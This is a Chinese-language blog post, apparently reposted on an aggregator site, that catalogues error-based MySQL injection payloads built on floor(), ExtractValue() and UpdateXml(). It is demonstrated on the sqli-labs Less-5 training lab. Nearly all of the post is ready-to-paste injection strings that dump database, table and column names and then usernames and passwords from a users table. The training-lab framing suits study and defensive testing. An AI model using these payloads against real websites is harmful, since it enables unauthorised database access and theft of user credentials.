SQL報錯常見的注入姿式

時間 2020-05-08

標籤 sql 報錯常見的注入欄目 SQL 简体版

原文原文鏈接

寫在前面

　　又是填坑的一篇姿式總結文，先介紹floor()、ExtractValue()、UpdateXml()，剩下的報錯我目前還沒遇到過（多是太菜）能夠用sqli-libs Less5來演示html

　　姿式彙總 https://www.cnblogs.com/wocalieshenmegui/p/5917967.htmlsql

floor()

　ExtractValue函數

UpdateXmlui

SQL報錯注入

　　通常的在頁面有報錯信息但沒顯位的時候有報錯時候使用，它的特色是注入速度快，可是語句較複雜,不能用group_concat(),只能用limit依次猜解，spa

　　這種前三步和正常的同樣，但當頁面無回顯注入數據只顯示SQL報錯信息時候就能夠嘗試利用.net

floor()

　　公式code

#庫名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+

#表名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(group_concat(table_name)AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=‘security’ LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+

# 列名
AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(group_concat(column_name)AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_name = 'users' and table_schema = 'security' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+ 

#數據
#（這個構造數據只能一個一個爆出來，經過limit函數控制）
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+（這個構造數據只能一個一個爆出來，經過limit函數控制）

ExtractValue

　　公式orm

#庫名
' and extractvalue(1, concat(0x5c, 1' and extractvalue(1, concat(0x5c,database()));--+

#表名
' and extractvalue(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema='security'),0x7e)) --+

#列名

' and extractvalue(1,concat(0x7e,(select group_concat( column_name) from information_schema.columns where table_name='users'),0x7e)) --+

#字段值

' and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from security.users ),0x7e)) --+

UpdateXml

公式xml

#庫名
' and 1=(updatexml(1,concat(0x3a,(select database())),1)) --+

#表名

' and 1=(updatexml(1,concat(0x3a,(select group_concat( table_name) from information_schema.tables where table_schema='security')),1)) --+

#字段名

' and 1=(updatexml(1,concat(0x3a,(select group_concat( column_name) from information_schema.columns where table_name='users')),1)) --+

#字段值

' and 1=(updatexml(1,concat(0x3a,(select group_concat(id,username,password) from security.users )),1)) --+

　　常見的就這3種，其餘的我目前沒見過（可能太菜），後續碰見會再更新htm

參考連接

https://blog.csdn.net/bangyan3903/article/details/101788019

https://blog.csdn.net/weixin_30852451/article/details/98668307

1. 【SQL注入】報錯注入
2. SQL注入---報錯注入
3. SQL報錯注入
4. SQL注入--盲注及報錯注入
5. SQL注入姿勢
6. 常見的注入方式
7. sql注入--雙查詢報錯注入
8. SQL注入:floor()報錯注入
9. sql注入——sqlserver報錯注入
10. SQL報錯型注入
更多相關文章...
• Spring DI（依賴注入）的實現方式：屬性注入和構造注入 - Spring教程
• SQLite 注入 - SQLite教程
• 常用的分佈式事務解決方案
• YAML 入門教程

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。